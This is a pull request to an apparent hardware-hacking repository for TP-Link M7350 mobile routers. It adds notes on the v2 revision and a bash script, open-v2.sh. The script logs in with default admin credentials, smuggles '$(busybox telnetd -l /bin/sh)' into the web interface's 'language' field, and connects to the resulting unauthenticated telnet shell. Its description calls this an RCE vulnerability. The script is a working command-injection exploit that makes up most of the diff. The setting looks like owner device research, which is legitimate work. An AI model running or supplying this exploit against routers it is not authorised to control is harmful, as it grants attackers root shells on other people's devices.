### PR TITLE
add some docs for the v2 revision

### DIFF
--- a/README-v2.md
+++ b/README-v2.md
@@ -1,0 +1,7 @@
+# TP-Link M7350 v2
+
+## Components
+
+- SoC: Qualcomm MSM 9625 (Flattened Device Tree)
+- Model: Qualcomm MSM 9625V2.1 MTP
+- Overall quite similar to v3

--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ The devices are generally based on Qualcomm SoCs.
 There are multiple hardware revisions. We have taken them apart and added
 photos, notes on specific parts and possible hardware modification:
 
+- [M7350 v2](README-v2.md)
 - [M7350 v3](README-v3.md)
 - [M7350 v4](README-v4.md)
 - [M7350 v5](README-v5.md)

--- a/open-v2.sh
+++ b/open-v2.sh
@@ -1,0 +1,25 @@
+#!/usr/bin/env bash
+
+nonce=$(curl -s 'http://192.168.0.1/cgi-bin/qcmap_auth' -X POST  -d '{"module":"authenticator","action":0}' | jq -r .nonce)
+if [[ $(uname) == 'Linux' ]]; then
+    md5=$(printf "%s:%s:%s" ${1-admin} ${2-admin} "$nonce" | md5sum | cut "-d " -f1)
+elif [[ $(uname) == 'Darwin' ]]; then
+    md5=$(printf "%s:%s:%s" ${1-admin} ${2-admin} "$nonce" | md5 | cut "-d " -f1)
+fi
+printf "Nonce: %s\nMD5: %s\n" "$nonce" "$md5"
+
+token=$(curl -s 'http://192.168.0.1/cgi-bin/qcmap_auth' -d '{"module":"authenticator","action":1,"digest":"'"$md5"'"}' | jq -r .token)
+
+printf "Token: %s\n" "$token" # seems to be `null`
+
+curl -s 'http://192.168.0.1/cgi-bin/qcmap_web_cgi' -b "tpweb_token=$token" -d '{"module":"webServer","action":1,"language":"$(busybox telnetd -l /bin/sh)"}' > /dev/null
+curl -s 'http://192.168.0.1/cgi-bin/qcmap_web_cgi' -b "tpweb_token=$token" -d '{"module":"webServer","action":1,"language":"en"}' > /dev/null
+
+echo Done.
+
+if [[ $(uname) == 'Linux' ]]; then
+    (stty -icanon -echo; nc -O1 192.168.0.1 23)
+elif [[ $(uname) == 'Darwin' ]]; then
+    (stty -icanon -echo; nc -O 192.168.0.1 23)
+fi
+stty icanon echo


### PR DESCRIPTION
I happen to have a v2, so I decided to take a quick look at it and add some docs.

Turns out v3 is quite similar to v2, with the exact same SoC, and similar RCE vulnerability.